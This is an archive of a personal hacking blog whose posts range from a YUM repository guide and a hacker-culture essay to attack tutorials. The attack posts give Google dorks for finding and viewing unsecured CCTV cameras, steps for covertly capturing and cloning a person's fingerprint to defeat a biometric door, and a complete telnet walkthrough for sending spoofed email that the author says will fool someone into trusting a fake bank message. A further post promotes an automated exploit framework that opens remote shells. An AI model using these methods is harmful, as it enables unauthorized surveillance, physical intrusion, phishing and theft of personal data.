H3RS

Operating System enhancements to prevent misuse of system calls.

2013-03-28T04:39:00.001-07:00

Well, After a long time I got a chance to talk about security during my presentation in Operating Systems 2 class. Though the talk was not about too fancy security stuffs but still one of the hard and old security mechanism devised long back. Here is the presentation:

Operating system enhancements to prevent misuse of systems from Dayal Dilli

Reference:
[1] Bernaschi, Massimo, Emanuele Gabrielli, and Luigi V. Mancini. "Operating system enhancements to prevent the misuse of system calls." Proceedings of the 7th ACM conference on Computer and communications security. ACM, 2000.
[2] "Exploiting Buffer Overflow", http://securitytube.net

Samsung s II pattern lock Vulnerability

2011-10-06T06:53:00.000-07:00

We love to think that once we set a pattern lock -- or any sort of lock -- on our beloved Android device that our information is safe, right? Well, the guys at BGR noticed that the information on the upcoming AT&T version of the Samsung Galaxy S II isn't so safe behind a once trusted pattern lock, and that it can quite simply be bypassed.

All you have to do to get around this is wake the device using the lock key, then let the screen time out, then wake it again with the lock key and you can access all the data. We have seen similar issues with Samsung in the past on the Fascinate, so maybe it is time they take a step back from all the added customizations. We can confirm that it happens on our review unit of the AT&T version, but the Sprint version does not suffer from the same issue.

Note that this indeed is a problem with all of the included locking mechanisms -- pattern, pin and password.

Hit the break check out a quick video of it in action at BGR and the official response from Samsung

Source

Hacking CCTV cams

2011-09-24T09:18:00.000-07:00

Hello Guys, Today I am not going to show you any stuffs but a small chicanery work yet an interesting one. Have you ever wanted to see what was going on on the other side of the world? With the following information, you can not only see through the eyes of Big Brother, but sometimes you can even zoom, pan, tilt, capture and save images. This is made possible by CCTV cameras that allow people to access cameras from anywhere in the world through the Internet.If the connection isn't password protected, the camera can be accessed by anyone! It's not as sneaky as it seems, though. You'll probably find that most of the footage is intended to be publicly transmitted, but it's still fascinating to peek into various corners of the world from your computer.

As usual Query for these unsecured cams through Google. Usual layman google searching doesn't helps here, we have to use some specific queries to get the CCTV cam links. Here I list some of the possible Google Dorks though not an exhaustive list, proves to be useful. Have Fun :-D

inurl:”ViewerFrame?Mode=
intitle:Axis 2400 video server

inurl:/view.shtml
intitle:”Live View / – AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210?
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1? intext:”Open Menu”
intext:”MOBOTIX M10? intext:”Open Menu”
intext:”MOBOTIX D10? intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console – Web Monitor”

Penetration testing in Biometric Systems

2011-09-19T09:59:00.000-07:00

Courtesy: FB1H2S aka Rahul Sasi Read More

Hello Guys, You might have wondered while watching some Hollywood movies whether James Bond and Bruce willis hacks which inchoated in the 90's are really possible. Of Course all the hacks are possible, but the way in which they show it in movies is different. The best example is CCTV cam hack by premji in Mankatha movie. It is one of the tweek that is known even to n00bs but it is insane if you follow premji's method to hack a CCTV cam. Breaking Biometric systems and finger print recognition are some of the tricks that are seen in many hollywood movies. In this post I would like to share with you all, the real penetration testing in Biometric systems. Once Again, I would like convey my thanks to Rahul Sasi, the author of this paper, his presentation at Null con and Garage4hackers.

Abstract: This paper act as a guide explaining the necessity of including Biometric-Devices in the scope of a network audit and the procedures that could be used for Security auditing one such system. The paper explains both local and remote attacks and the procedures to carry out vulnerability detection, exploitation and reporting.
Introduction: Biometric Fingerprint system is rapidly developing and the no of Biometric systems deployed is increasing day by day along with the amount of vital information it is holding. And this brings the necessity of including these devices on to the list of devices subjected to a Penetration Testing/Security Auditing.

Biometric Fingerprint systems have several advantages over classical methods based on password and ID cards. These systems are considered effective and fast. The advantages of this system over traditional systems are very high. In spite of the many advantages biometric systems got few draw-backs like a)Your finger print is not a secret eg: any one could have a copy of your finger print b) it’s a onetime password once stolen cannot be reset to a new value. Furthermore the different attack vectors of a biometric system are numbered and mentioned in diagram.

http://farm6.static.flickr.com/5014/...762962b4_z.jpg

Diagram fb1_01 explains the various possible points of attack, and these would be the areas this research would be concentrating on. On basis of the attack methodology we have categorized the attacks into Local and Remote attacks.

Local Attacks:
1) Finger Print Sensor
2) USB Data Manager

Remote Attacks:

3) Remote IP Management
4) Back End Database
5) Finger Print Manager (Admin Interface)

The above mentioned architecture and attacking vectors would be same for all Biometric implementation. Biometric Finger print scanners application are varied and we will discuss on the following deployments,
• Biometric Attendance Management System used to automate a reliable attendance managing system.
• Biometric Finger print guarded doors, implemented for keyless secure access to doors.

http://farm6.static.flickr.com/5020/...c712a6ce_z.jpg

Biometrics: The Non Technical part:

Local Attack: Finger print sensor
Finger print scanners read input using two methodologies:
1) Optical scanner
2) Capacitance scanner

Optical Scanner are most widely used ones and the main part of it are the CCD[charge coupled device ], these are simply an array of light-sensitive diodes called photosites, which generate an electrical signal in response to light photons. Each photosite records a pixel, a tiny dot representing the light that hit that spot. Collectively, the light and dark pixels form an image of the scanned finger print. So the theory says that if a similar image of finger print is placed in front the scanner we would be able to bypass them. This theory is practically not easy as the problems we would have to face would be the validation of the machine in order to differentiate between a real and valid image by checking the average pixel darkness, or the overall values in a small sample by rejecting the scan if the overall image is too dark or too light. One part of this paper would be reproducing two dimensional images of a fingerprint.

http://farm6.static.flickr.com/5171/...c37fc86d_z.jpg

Capacitance Scanners work on the principle of capacitance. It relies on the properties of flesh and air to measure differences in capacitance on the scanner when the finger is placed upon the scanner. Certain systems along with capacitance checks blood flow, temperature, and even simulate human sweat.
One advantage of capacitance scanners over optical scanners is the fact that the capacitance scanner requires a three-dimensional print, whereas an optical scanner needs a two dimensional only. This makes the capacitance scanners more difficult to deceive. However, if one could recreate a three-dimensional representation of a print, then one could theoretically “trick” the scanner into falsely authenticating a user.
The objective of the first section is to try by-passing these devices by steeling and cloning the fingerprint. And later these clones would be modified into three dimensional and two dimensional dummy s that could be used to see the above mentions vulnerabilities exist or not.
This above mentioned approaches are practically not easy as the problems we would have to face would be the validation of the machine in order to differentiate between a real and valid image by checking the average pixel darkness, or the overall values in a small sample by rejecting the scan if the overall image is too dark or too light. .

http://farm6.static.flickr.com/5171/...c37fc86d_z.jpg

Direct attacks:

Detailed methodology: Penetration Testing a Biometric device.
This section will explain the methodologies in order to recreate a fingerprint for tricking these systems. Attacks like this were seen in videos that were spreading over the internet by using a Photostat or image of the fingerprint. The issue we would be facing would be the protection mechanism the systems have employed in order to prevent against such attacks. Enough with the theoretical part let’s move on to some action.
Objective: To bypass a finger print guarded door or to fake a finger print attendance system.
Targets: Finger print guarded confidential room.
Scenario: Here our target would be a finger print guarded door where only the Manager is allowed access using his fingerprint.

Bypassing a Finger print guarded door or attacking and faking an attendance system.
The first attack would not get the cooperation of user but in the second on we could. So I will talk about the first case, as same methodology could be used in second scenario too. First step would be to obtain victim’s fingerprint that could later be used to recreate a dummy fingerprint. Human fingers have friction ridges. And there are eccrine glands that produce natural secretion of sweat on the fingers. So there would be the Impressions of fingerprints left behind on surface when touched. What causes the fingerprint is a very important factor, because recreating a fingerprint form few substances only would yield good results. Below is an image of a finger print impression caught on a glass table

http://farm6.static.flickr.com/5177/...fd2d41f0_z.jpg

Instead of going after cups and bottles my idea here is to build a logger, a setup that could log fingerprints when the victim logs in using the biometric machine. A traditional Biometric sensor looks like this.

http://farm6.static.flickr.com/5298/...73aa143f_z.jpg

It’s possible to place a transparent plastic cover on top of sensor and, whenever the victim logs in his impression would be on the plastic, the authentication would take place and later plastic could be removed and reproduced.
Refraction:
The problems we would have to face in the above procedure are refraction, refractive index of the material we place on top of the sensor matters, as we have to maintain stealth. Why refractive index because when light passes form one media to another other it may also change its propagation direction [Refraction] in proportion to the refractive index and the sensor won’t be able to understand the distorted image and login won’t take place.

http://farm6.static.flickr.com/5297/...b945b261_z.jpg

This would create suspicion. So our logger would be build using a thin transparent sheet placed on top of an OHP sheet cut out, in order to hold it stern.

Building the logger:

Equipments needed: OHP sheets and thin transparent plastic sheet.
1) Cut out a piece of OHP sheet with approximate size of Finger print sensor
2) Cut equal piece of transparent thin plastic sheet.
3) Make a U shaped cut out on the OHP sheet piece.
4) Wrap the thin plastic on top of the U shaped cut out and logger is ready.

http://farm6.static.flickr.com/5180/...650809e3_z.jpg

An alternative is to find a thin OHP sheet film and directly use it as the logger.

Placing the logger:
1) Make sure you are able to reach the biometric guarded door.
2) Slide in the logger into the sensor region make sure no parts of our logger sticks out.
3) Wait for the victim to log into using his valid finger print.
4) Remove the logger and store it in a small box, now we have a valid finger print with us.

http://farm6.static.flickr.com/5014/...4203d213_z.jpg

Working of Sensors and Detection Algorithms:

Before trying to recreate the fake finger print the few points to be noted are that, the sensors scans the image and compares it with an internal database of stored images. The image matching is done based on few specific branches and loops at specific points. It could also count specific ridges from one point to another building a unique pattern for matching. There are few special points which are practically unique for all finger prints and the scanner image matching algorithms uses the same points for detection. So the point is. We have to take extra care at these regions (dig) when reproducing the fake finger print. In the below mention diagrams diagram fb1_01 shows how a finger print impression would be stored in the database of the matcher, fb1_02 show the regions that the scanner considers when the matching is done, and fb1_03 shows the special points which all the comparing algorithms consider in matching algorithms.

http://farm6.static.flickr.com/5132/...a2ff7cbc_z.jpg

Reproducing a Fake Finger print:

Equipments needed: Finger print powder, cello tape, light brush, a good lab with suitable lighting to recreate the dummy.

1) Apply finger print powder and brush the obtained impression so that the powder will stick to the fringes (dig: fb1_03).
2) Once the fringes are visible brush out the unwanted powder.
3) Lift the finer print using a cello tape form the plastic surface and you have a 2D fake finger print.
4) For building a 3D impression, apply fevicol to the lifted finger print and allow it to cool.

http://farm6.static.flickr.com/5251/...437ed448_z.jpg

Only optical scanners were tested and the above mentioned methods worked on a few systems with less effort, the output is directly proportional to the quality of dummy finger print you are able to obtain.

Local Attack: USB Data Manager.

Objective: To steel sensitive information stored on the device like employee details, employee salary details, and other confidential details of the employees.
Targets: Finger print attendance monitoring system placed at the door of your organization.

Biometrics devices have inbuilt data storage, were it stores the Finger prints and user information. Unlike other data sources these Biometric devices are not kept in a protected area instead kept at building entry or other unrestricted places where they could be easily accessed. Basically all the Biometric systems come with a USB support in order to download and upload finger prints and other log detail to and from the device. A normal USB dongle could be used to download data from the device. Most of the devices do not have any sort of protection mechanism employed to prevent data theft, and those which uses password protection often is deployed with default password. So if the attacker could walk to the system with a USB Pen drive then he would be able to copy all the data. Data includes employee personal information, finger prints, time they logged in and other sensitive information. I have gathered and listed commonly used devices default password.

http://farm6.static.flickr.com/5014/...f991cc18_z.jpg

Hacking sleep - Building your own sleep lab

2011-09-19T09:39:00.001-07:00

e-mail spoofing through Open SMTP relay servers

2011-09-15T09:53:00.000-07:00

Hello Guys, In this post I am going to explain about how to send spoofed mail by using Open SMTP relay servers. The Obvious Question that you can ask is that, Why to use this method when there are many providing anonymous mail servers? The answer is only 4-5% of those anonymous mail servers works correctly and even those small numbers are being blocked. So, it is better to device a technique by which we ourselves can send spoof mails. Well, this is not a new techniques, of course it is a technique used for years together, but I will explain you about the entire process involved in it, So that You can easily work it out.

The first thing is that We need to find an SMTP server. Well the server provided by our ISPs can themselves can be used if they support relaying. If you are in India Airtel blocks SMTPs and BSNL is secured enough to block relaying. One of the best SMTP servers I have found is http://smtp2go.com.

Visit the above site and sign up for a free registration.

Now open Command prompt in Your machine and follow the steps:

Before continuing, there are two definitions which should be explained.

Mail User Agent: A program which accepts input from an end user, formats that data into a form which mailservers will understand, and sends that data to a mailserver.

Mail Transfer Agent: Any program which will accept mail, either from a Mail User Agent or another Mail Transfer Agent, and forward it one step closer, to another MTA, or an MUA for final delivery.

In this tutorial, I am using telnet as my MUA.
If you are using windows, open a command prompt first, and enter the following command:

Code:

telnet <smtp2go.com> 25

You should get a banner telling you that you have indeed connectected to the mailserver. This banner typically consists of a message type number (usually 220), the name of the mailserver, which protocol it is using (this is usually either SMTP or ESMTP; for the purposes of this tutorial we will be using only SMTP), and the software it is using, which usually includes the version number. In my case, I get the following prompt:

Code:

Connected to mailserver.

Escape character is '^]'.

220 <smtp2go.com> ESMTP server (InterMail vM.5.01.06.10 201-253-122-130-110-20040306) ready Thu, 28 Apr 2005 03:42:03 -0400

At this point you identify to the mail server two things: which protocol (SMTP/ESMTP) you will be using, and your domain name. The protocol is identified with either the HELO command, indicating that you will be using SMTP, or the EHLO command, indicating that you will be using ESMTP. As stated, we will be using SMTP only for this tutorial. At this point you can give a false domain name to the mailserver. Beware, however, that many mailservers now verify that the domain you give it is in fact a valid domain; you may need to supply an existing domain name. My mailserver does not perform this validation. I will use the domain gmail.com.

The format of this command is as follows:

[HELO|EHLO] <domain name>

So for example, I identify myself to the mailserver as:

Code:

HELO gmail.com

You should now see message type 250. Some mailservers will reply with something like "Hello northpole.net". In my case, it simply replies with message type 250 and its name again.

Now begins the process of actually writing the mail. To inform the server that you wish to send mail, issue the command

MAIL FROM: "Sender Name" <email address>

Including the "<" and ">". I will be spoofing the address "santaclaus@northpole.net". The from field should include both the name of the sender and his/her email address. So the command is:

Code:

MAIL FROM: "Dayal" <Dayal@gmail.com>

At this point, the mailserver will verify that it is authorized to send from this address for you. If it is, you should see message type 250 again with the message text "Sender <email address> ok". In my case, I see:

Code:

250 Sender "Dayal" <Dayal@gmail.com> Ok

The server now requires the address you will be sending this mail to. The destination address should contain only the recipient email address. Multiple destination addresses can be specified at this point. These multiple addresses would be specified as additional RCPT TO: commands on subsequent lines. The command syntax is:

RCPT TO: <destination address>

So in my case, since I want to send fake email to Bill Gates, I will enter

Code:

RCPT TO: <billgates@microsoft.com>

The mailserver now validates that it is permitted to send mail to this address for you. This will include checks to ensure that if this email is not on its list of users, that it is allowed to relay mail for you. An open mail realy, a common tool of spammers, would at this point not verify that you are a valid sender, instead relaying mail for anyone connecting to it. The message I recieve at this point is:

Code:

250 Recipient <billgates@microsoft.com> Ok

Since this is my local mailserver, it is allowed to relay mail to billgates@microsoft.com for me.

Now we begin the actual data that the email will consist of. This will begin with the simple statement DATA. Most mailservers will now inform you that to end the email, you should enter as the last line, a line containing only a period. It should look something like:

Code:

354 Ok Send data ending with .

We now enter the email data. However, do not start writing out the text of the email yet. This would be caught by most mailservers as spam, since it does not look like most emails do. You would also have an email with no subject, as the subject heading is sent as part of the message data. At minimum, you should include the sender name and address, the recipient address, as well as a subject line.

The sender address in the message data would be specified as it was in the MAIL FROM: command, but without the quotes around the sender's name, and "From: " in front of it. The syntax is as follows:

From: "Recipient Name" <name@domain.name>

Without the quotes around the sender's name. So in my case, I enter:

Code:

From: Dayal <Dayal@gmail.com>

The destination address is specified in exactly the same manner as it was in the RCPT TO: command, but with "To: " in front of it. The syntax is as follows:

To: <name@domain.name>

So in my case, since I am sending this mail to billgates@microsoft.com, I would enter:

Code:

To: billgates@microsoft.com

And I imagine at this point you can guess how the subject line will be specified. With the syntax:

Subject: <enter your subject here>

Without the "<" or ">"

I will enter:

Code:

Subject: Linux is better

This should be enough information to fool most mailservers into thinking that this is a legitamite email.

At this point you can begin entering the actual message text. This can obviously be anything you wish. I will enter:

Code:

Roses are #FF0000

Violets are #0000FF

All my base

Are belong to you!

To inform the mailserver that you are finished entering data, enter as data a single line with only a period. This is what mailservers mean when they send the message "End data with <CRLF>.<CRLF>".

You should now see a message, type 250, informing you that the message has been accepted for delivery, and giving you the message ID number for tracking. In my case, I see the following:

Code:

250 Message received: 20050428081348.PSBZ1623.<mailserver>@[my ip address]

The message is now ready to be sent, and likely already has. All you must do at this point is enter

Code:

QUIT

And the mailserver will terminate the connection with you gracefully.

The entire communication, including server responses, looked like this:

Code:

kj@localhost:~$ telnet mailserver 25

Trying mailserver...

Connected to mailserver.

Escape character is '^]'.

220 mailserver ESMTP server (InterMail vM.5.01.06.10 201-253-122-130-110-20040306) ready Thu, 28 Apr 2005 04:26:56 -0400

HELO

250 mailserver

MAIL FROM: "Dayal" <Dayal@gmail.com>

250 Sender <Dayal@gmail.com> Ok

RCPT TO: <billgates@microsoft.com>

250 Recipient <billgates@microsoft.com> Ok

DATA

354 Ok Send data ending with <CRLF>.<CRLF>

From: Dayal <Dayal@gmail.com>

To: billgates@microsoft.com

Subject: Linux is better

Roses are #0000FF

Violets are #FF0000

All my base

Are belong to you!

250 Message received: 20050428082735.WVIK1597.mailservert@[my IP address]

quit

221 mailserver ESMTP server closing connection

Connection closed by foreign host.

Although this will effectively spoof the email, making it appear that it is from someone which it is not, your IP address has still been logged and you are still traceable. Do not assume that this is a form of anonymous email. Your IP address will show up in the message headers when it is recieved, and this can be crossreferenced with your ISP's DHCP records to determine who sent the email. It will, however, fool Aunt Sally into believeing the email really did come from the bank.

More data can be placed at the beginning of the message data, just after the DATA command. Mail User Agents put a variety of information here, such as message ID numbers, date and time stamps, priority, encoding type, which program sent the mail, MIME types, character sets used, etc... Try experimenting to see what works and what doesn't.

I hope this has given a clear example of how easy it is to spoof an email address to appear as if it were from a different sender. The from field is not determined by the mailserver. It is given by the user (or the Mail User Agent) connecting to it, and therfore easily falsified. The email address you see in the from field on spam addresses does not even have to exist to appear there.

And the important note is that even the MAIL FROM: field email address need on exist. Here lies the actual spoof trick. Once you login into your smpt2go.com your can update your information to any of the email which doesn't need to be in existence. So, once you have updated it there, you can use it in MAIL FROM: field so that the email id can be spoofed. Also make sure that before you log out from smpt2go.com your update your information to your original email id for safety purposes.

Creating Custom YUM Repositary in Fedora 13

2011-09-12T08:21:00.000-07:00

Greetz to authors and editors Ajay, KMK, Aj, KKyn, Dev, Kapsy for making our blog get second prize in a state level event. Next time we are making it to injectors. Cheers!!! :-D

What is YUM?
The Yellowdog Updater, Modified (YUM) is an open-source command-line package-management utility for RPM-compatible Linux operating systemsand has been released under the GNU General Public License. It was developed by Seth Vidal and a group of volunteer programmers. Though yum has a command-line interface, several other tools provide graphical user interfaces to yum functionality.

As a full rewrite of its predecessor tool, Yellowdog Updater (YUP), yum evolved primarily in order to update and manage Red Hat Linux systems used at the Duke University department of Physics. Since then, it has been adopted by Red Hat Enterprise Linux, Fedora, CentOS, and many other RPM-basedLinux distributions, including Yellow Dog Linux itself, where it has replaced the original YUP utility.

System administrators can automate software updates using yum-updatesd, the yum-updateonboot package, the yum-cron package, or PackageKit.

Yum's XML repository, built with input from many other developers, quickly became the standard for RPM-based repositories. Besides the distributions that use Yum directly, SUSE Linux 10.1 adds support for Yum repositories in YaST, and the openSUSE Build Service repositories use the YUM XML repository format.

Why to Setup a Local YUM Repositary?

Well, this is one of the conspicuous question that arises. Why to go for a custom Yum Repositary when there is internet connection as we can download the packages from the various mirrors available. Consider a situation where there are 100 computers in a LAN. If we need to install some packages in each system individually, it is really time and bandwidth consuming. So What we do is, we will configure a system in our LAN to serve the rpms so that the packages are served to other systems efficiently.

Assumption:

Here in this tutorial I will use 192.168.1.5 as the server ip address. Don't be a n00b and use the same thing while you are configuring, use your own ip address. I want to make the yum repository accessible through http; Apache's default document root on Fedora is /var/www/html, so I'll create the repository in

/var/www/html/yum. If you're using a different vhost, you might have to adjust the paths.

Installing Apache:

Let's install Apache:

yum install httpd

Afterwards, we create the system startup links for Apache (so that Apache starts automatically when the system boots):

chkconfig --levels 235 httpd on

Then we start Apache:

/etc/init.d/httpd start

Building the Repositary:

First we install the tool createrepo:

yum install createrepo

I want to place the Fedora 8 rpm packages for i386 in /var/www/html/yum/base/13/i386 and the update packages in /var/www/html/yum/updates/13/i386, so I create these directories now (adjust the paths if you want to create a repository for Fedora 8/7/6/... and/or x86_64):

mkdir -p /var/www/html/yum/base/13/i386
mkdir -p /var/www/html/yum/updates/13/i386

Now let's fill the /var/www/html/yum/base/13/i386 directory. Mount the CD-ROM, and copy the rpm packages to /var/www/html/yum/base/13/i386:

mount /dev/cdrom /mnt
cd /mnt/Packages
cp -v * /var/www/html/yum/base/13/i386
cd /
umount /mnt

Alternatively, If you have the Fedora 13 iso image use

mount -o loop /mnt

Have a tea or chat with your mate, till the packages gets copied.

Afterwards, run the createrepo command:

createrepo /var/www/html/yum/base/13/i386

This will create a repodata directory in the /var/www/html/yum/base/13/i386 directory. Its contents should be as follows:

ls -l /var/www/html/yum/base/13/i386/repodata/

[root@kj /]# ls -l /var/www/html/yum/base/13/i386/repodata/
total 9268
-rw-r--r-- 1 root root 2227275 2007-12-18 21:11 filelists.xml.gz
-rw-r--r-- 1 root root 6487453 2007-12-18 21:11 other.xml.gz
-rw-r--r-- 1 root root 747714 2007-12-18 21:11 primary.xml.gz
-rw-r--r-- 1 root root 951 2007-12-18 21:11 repomd.xml
[root@kj /]#

Now let's fill the updates directory /var/www/html/yum/updates/13/i386. Go to http://mirrors.fedoraproject.org/publiclist/Fedora/13/i386/ again, find a mirror that offersrsync, and download the packages as follows:

rsync -avrt rsync://mirror.aarnet.edu.au/pub/fedora/linux/updates/13/i386/ --exclude=debug/ /var/www/html/yum/updates/13/i386

Again, make sure that you use the slashes (/) as shown above! Make sure that you make some arrangements to kill the boredom( I will prefer blackcr*w :-P), because it will take more than an hour to download if your internet connection is slow.

To make our local mirror download the latest updates automatically from now on, we can create a cron job. For example, to download the latest updates every second day at 04:23h, we create the following cron job:

crontab -e

23 4 */2 * * /usr/bin/rsync -avrt rsync://mirror.aarnet.edu.au/pub/fedora/linux/updates/13/i386/ --exclude=debug/ /var/www/html/yum/updates/13/i386

Our local yum mirror is now ready to be used.

Client Configuration:

To make our Fedora 13 systems use the new local yum repository, we modify /etc/yum.conf on each Fedora 8 system (you can even do this on the mirror itself if it is a Fedora 8 system). Open /etc/yum.conf:

Find the first two lines,

# PUT YOUR REPOS HERE OR IN separate files named file.repo

# in /etc/yum.repos.d

... and add the following stanzas below these lines:

[base-local]

name=Fedora $releasever - $basearch

failovermethod=priority

baseurl=http://192.168.1.5/yum/base/$releasever/$basearch

#mirrorlist=http://mirrors.fedoraproject.org/mirrorlist?repo=fedora-$releasever&arch=$basearch

enabled=1

gpgcheck=0

[updates-local]

name=Fedora $releasever - $basearch - Updates

failovermethod=priority

baseurl=http://192.168.1.5/yum/updates/$releasever/$basearch/

#mirrorlist=http://mirrors.fedoraproject.org/mirrorlist?repo=updates-released-f$releasever&arch=$basearch

enabled=1

gpgcheck=0

Now whenever you use yum and your local repository can serve the requested packages, the packages are downloaded and installed from the local yum repository.

HACKER CULTURE

2011-09-09T10:09:00.000-07:00

The present day scenario is that whenever a person hears the word “HACKER” only two things comes to his mind, that Hacker is a very malicious guy and the second thing is the most interesting one. They have this

common perception is that hacking is easy thanks to the blatant portrayal of hackers and hacking in films (A guy comes with a beer in his one hand with a music player in the other and types two lines of code, abracadabra the screen transforms into millions of fast moving lines green text and poof the guy has broken into one of the most secure networks in the world and he sips his drink with a smirk on his face).

The most common notion is that hacking is associated only with computers. Hacking does not pertain itself to the field of computer science alone. Hackers are found in all streams of sciences for instance a guy who can pick the most complex lock or who can find a loophole in a game just by playing it extensively is also a hacker. We can see in DEFCON conferences where people from all forms of sciences give their papers. Even doctors (whom we think have no part of hacking world) are a part of it. Hacking is just that whatever others perceive as difficult and cannot be done, being accomplished by some people. Those people are called as hackers.

The word hacker means different things to different people especially very intriguing to the laymen. The definition of the word hacker varies along the timeline of history. The basic question is whether a hacker is the good guy or the bad guy ( neenga nallavara illa kettavara ). Hackers were not always the bad guys. Actually a hacker is a person who enjoys exploring the details of programmable systems and stretching their capabilities, as opposed to most users, who prefer to learn only the minimum necessary. He is a person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular. There are two types of hackers in sense with the chronological order-the old school hackers and the new school hackers.

The old school hackers were the hackers from 1950’s and the 1960’s. They were mostly the United States academia in the MIT and HARVARD. They functioned mostly in the college campuses as they had access to computers there only. They considered them as the good guys and actually they were all good. They considered them as the hackers and their heirs the new school ones as the malicious ones and termed them as crackers instead to differentiate between them. But the term hacker alone got famous. The old school hackers were more of a guardian angel. They explored the systems and found the loopholes in them and provided sufficient counter measures which led to the development of many new technologies. They eventually shifted to Silicon Valley and started their own companies which every one of yearn to work in. They were pure technological geniuses and more of what we all people call as a nerd (consider them 100 % nerdier than the guy who is sitting in the first bench of your class with neatly combed oiled hair.)

Whereas the new school hackers are the hackers from the eighties till the noughties and still going, with the advent of the personal computers bought their work to their home and easier accesses. Their main task was to get past the concept of PIN’s and encryption. The average age also decreased very much that most of the new age hackers are teenagers. The new age hackers began to think being portrayed as a criminal in mass media as a cool thing and began drifting in the wrong side of the ethics which started basically from fooling a friend which burgeoned into defacing and cracking into secure systems. The new age hackers identified hacking as a way to revolt against those who didn’t understand him.

Not all hackers try to explore forbidden computer systems. Some use their talents and knowledge to create better software and security measures. In fact, many hackers who once used their skills to break into systems now put that knowledge and ingenuity to use by creating more comprehensive security measures. In a way, the Internet is a battleground between different kinds of hackers -- the bad guys, or black hats, who try to infiltrate systems or spread viruses, and the good guys, or white hats, who bolster security systems and develop powerful virus protection software.

Hackers and their ways have been portrayed in various media in the form of books and films. All mostly give a false portrayal. Don’t be fooled by the portrayal of hacking and hackers in mass media. Hacking by itself is not malicious but when it is transformed to cracking it is damn malicious.

Hacking is an art and it is a dangerous one too. It is a double edged sword so use it wisely.

winAutopwn 2.7 Released

2011-09-07T07:00:00.000-07:00

winAUTOPWN and bsdAUTOPWN are minimal Interactive Frameworks which act as a frontend for quick systems vulnerability exploitation. It takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi-threaded portscan for TCP ports 1 to 65535. Exploits capable of giving Remote Shells, which are released publicly over the Internet by active contributors and exploit writers are constantly added to winAUTOPWN/bsdAUTOPWN.A lot of these exploits are written in scripting languages like python, perl and php. Presence of these language interpreters is essential for successful exploitations using winAUTOPWN/bsdAUTOPWN.

Exploits written in languages like C, Delphi, ASM which can be compiled are pre-compiled and added along-with others. On successful exploitation winAUTOPWN/bsdAUTOPWN gives a remote shell and waits for the attacker to use the shell before trying other exploits. This way the attacker can count and check the number of exploits which actually worked on a Target System.

A video showing winAUTOPWN in action is available here :

http://108b7325.ugalleries.net

This version incorporates a few new commandline parameters: -perlrevshURL (for a PERL Reverse Shell URL), -mailFROM (smtpsender) and -mailTO (smtpreceiver). These are the commandline arguments required for a few exploits which require remote connect-back using a perl shell and email server exploits requiring authentication respectively.

This version also tackles various internal bugs and fixes them.

A complete list of all Exploits in winAUTOPWN is available in CHANGELOG.TXT

A complete list of User Interface changes is available in UI_CHANGES.txt

Also, in this version :

BSDAUTOPWN has been upgraded to version 1.5.

In this release you will also find pre-compiled binaries for :

FreeBSD x86

FreeBSD x64

DragonFly BSD x86

A complete Document explaining : How to use winAUTOPWN/bsdAUTOPWN, How to add your own exploits using WELF, other advanced command-line options and everything else related to WINDOWS AUTOPWN is available at the Downloads Section.

It is also available online at: http://resources.infosecinstitute.com/vulnerability-testing-winautopwn/

Kernel.org Rooted

2011-09-05T07:31:00.000-07:00

Source: http://kernel.org
Earlier this month, a number of servers in the kernel.org infrastructure were compromised. We discovered this August 28th. While we currently believe that the source code repositories were unaffected, we are in the process of verifying this and taking steps to enhance security across the kernel.org infrastructure.

What happened?

Intruders gained root access on the server Hera. We believe they may have gained this access via a compromised user credential; how they managed to exploit that to root access is currently unknown and is being investigated.
Files belonging to ssh (openssh, openssh-server and openssh-clients) were modified and running live.
A trojan startup file was added to the system start up scripts
User interactions were logged, as well as some exploit code. We have retained this for now.
Trojan initially discovered due to the Xnest /dev/mem error message w/o Xnest installed; have been seen on other systems. It is unclear if systems that exhibit this message are susceptible, compromised or not. If developers see this, and you don't have Xnest installed, please investigate.
It *appears* that 3.1-rc2 might have blocked the exploit injector, we don't know if this is intentional or a side affect of another bugfix or change.

What Has Been Done so far:

We have currently taken boxes off line to do a backup and are in the process of doing complete reinstalls.
We have notified authorities in the United States and in Europe to assist with the investigation
We will be doing a full reinstall on all boxes on kernel.org
We are in the process of doing an analysis on the code within git, and the tarballs to confirm that nothing has been modified

Find your G-mail account creation date

2011-08-30T05:23:00.000-07:00

Whenever your gmail account is hacked by someone.The first troubleshoot which you resort to is the password recovery option...But the problem is that if your alternate E-mail id and the security questions have all been changed you have no other option than to send a recovery mail to gmail along with your account creation date....Many are not aware as how to view their account creation date.So make a note of it while you have the control of your account.....Here we will teach you how to recover your account creation date

"How to find Gmail account creation date".

Well, this question has immense value when it comes to Gmail password recovery. Why??? Because, during initiating a password reset using Gmail Contact Form, you have to enter the Gmail account creation date, otherwise you are not allowed to reset your password. So, I have mentioned two ways by which you can know your Gmail account creation date.
Find Gmail account creation date

Note: This article is not meant for those who have lost their password. I am writing this article for those who have access to their account, but don't know how to check Gmail account creation date. In future, if by some means, you lose your password and want to use Gmail accounts Form, this Gmail account creation date will help you.
Get Gmail account creation Date:

1. Gmail Welcome Mail:

All Gmail accounts receive "Gmail Welcome Mail" after they create their Gmail account. So, this "Welcome Mail" has the same date as your Gmail account creation date. So, noting this date will serve the purpose. Go to Gmail inbox and hit on Oldest button to get the last message. This message will be from Gmail Team. Note this mail's date. Done!!!

But, many readers said that they have deleted Welcome mail and so are unable to get the account creation date. If you are one of them, proceed to the second point.

2. Using POP:

Well, this method will work for accounts created after 2007.
